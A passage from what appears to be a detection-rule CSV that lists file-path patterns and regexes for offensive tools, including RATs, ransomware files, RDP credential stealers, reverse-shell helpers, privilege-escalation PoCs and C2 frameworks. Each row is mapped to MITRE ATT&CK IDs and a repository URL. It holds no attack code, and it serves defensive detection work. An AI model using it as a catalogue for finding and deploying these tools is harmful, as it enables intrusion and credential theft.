"*\pywsus.py*",".{0,1000}\\pywsus\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\QueryModuleClient.exe*",".{0,1000}\\QueryModuleClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\QuickViewAD.ps1*",".{0,1000}\\QuickViewAD\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*\r00t-3xp10it*",".{0,1000}\\r00t\-3xp10it.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\RagingRotator.go*",".{0,1000}\\RagingRotator\.go.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*\Ransomware.dll*",".{0,1000}\\Ransomware\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Ransomware.exe",".{0,1000}\\Ransomware\.exe","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*\Ransomware.pdb*",".{0,1000}\\Ransomware\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\rarce.py*",".{0,1000}\\rarce\.py.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*\RasMan.cpp*",".{0,1000}RasMan\.cpp.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*\rasman.exe*",".{0,1000}\\rasman\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*\RasMan.sln*",".{0,1000}RasMan\.sln.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*\RasmanPotato*",".{0,1000}\\RasmanPotato.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*\ratchatPT.go*",".{0,1000}\\ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*\ratchatPT.syso*",".{0,1000}\\ratchatPT\.syso.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*\rats\badrat_cs\*",".{0,1000}\\rats\\badrat_cs\\.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\rats\js_downloader.vba*",".{0,1000}\\rats\\js_downloader\.vba.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\rattler.cpp*",".{0,1000}\\rattler\.cpp.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*\Rattler.exe*",".{0,1000}\\Rattler\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*\Rattler_32.exe*",".{0,1000}\\Rattler_32\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*\Rattler_x64.exe*",".{0,1000}\\Rattler_x64\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*\rattler-master*",".{0,1000}\\rattler\-master.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*\Rat-x64.exe*",".{0,1000}\\Rat\-x64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Rat-x64.lnk*",".{0,1000}\\Rat\-x64\.lnk.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\rcat-v*-win-x86_64.exe*",".{0,1000}\\rcat\-v.{0,1000}\-win\-x86_64\.exe.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*\rdcman.py*",".{0,1000}\\rdcman\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\rdp.py*",".{0,1000}\\rdp\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\RDPCredsStealerDLL*",".{0,1000}\\RDPCredsStealerDLL.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*\RDPHook.dll*",".{0,1000}\\RDPHook\.dll.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*\RDPMITM.py*",".{0,1000}\\RDPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\rdpv.exe*",".{0,1000}\\rdpv\.exe.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\ReadPEInMemory.exe*",".{0,1000}\\ReadPEInMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\Reaper\Reaper.cpp*",".{0,1000}\\Reaper\\Reaper\.cpp.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*\Reaper-main\*.sys*",".{0,1000}\\Reaper\-main\\.{0,1000}\.sys.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*\REC2-main.zip*",".{0,1000}\\REC2\-main\.zip.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*\Recon.tests.ps1*",".{0,1000}\\Recon\.tests\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\Recon-AD-AllLocalGroups.dll",".{0,1000}\\Recon\-AD\-AllLocalGroups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-AllLocalGroups.sln*",".{0,1000}\\Recon\-AD\-AllLocalGroups\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-AllLocalGroups\*",".{0,1000}\\Recon\-AD\-AllLocalGroups\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Computers.dll",".{0,1000}\\Recon\-AD\-Computers\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Computers.sln*",".{0,1000}\\Recon\-AD\-Computers\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Computers\*",".{0,1000}\\Recon\-AD\-Computers\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Domain.dll",".{0,1000}\\Recon\-AD\-Domain\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Domain.sln*",".{0,1000}\\Recon\-AD\-Domain\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Domain\*",".{0,1000}\\Recon\-AD\-Domain\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Groups.dll",".{0,1000}\\Recon\-AD\-Groups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Groups.sln*",".{0,1000}\\Recon\-AD\-Groups\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-LocalGroups.dll*",".{0,1000}\\Recon\-AD\-LocalGroups\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-LocalGroups.sln*",".{0,1000}\\Recon\-AD\-LocalGroups\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-LocalGroups\*",".{0,1000}\\Recon\-AD\-LocalGroups\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-master*",".{0,1000}\\Recon\-AD\-master.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-SPNs.sln*",".{0,1000}\\Recon\-AD\-SPNs\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-SPNs\*",".{0,1000}\\Recon\-AD\-SPNs\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Users.dll*",".{0,1000}\\Recon\-AD\-Users\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\Recon-AD-Users.sln*",".{0,1000}\\Recon\-AD\-Users\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\RecycledGate.c*",".{0,1000}\\RecycledGate\.c.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","0","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*\RedPersist.exe*",".{0,1000}\\RedPersist\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*\RedPersist.pdb*",".{0,1000}\\RedPersist\.pdb.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*\RedPersist.sln*",".{0,1000}\\RedPersist\.sln.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*\RedPersist-main\*",".{0,1000}\\RedPersist\-main\\.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*\redpill.ps1*",".{0,1000}\\redpill\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\redpill.zip*",".{0,1000}\\redpill\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\redpill.zip*",".{0,1000}\\redpill\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\redpill\bin\*.ps1*",".{0,1000}\\redpill\\bin\\.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\reflective_dll.x64.dll*",".{0,1000}\\reflective_dll\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 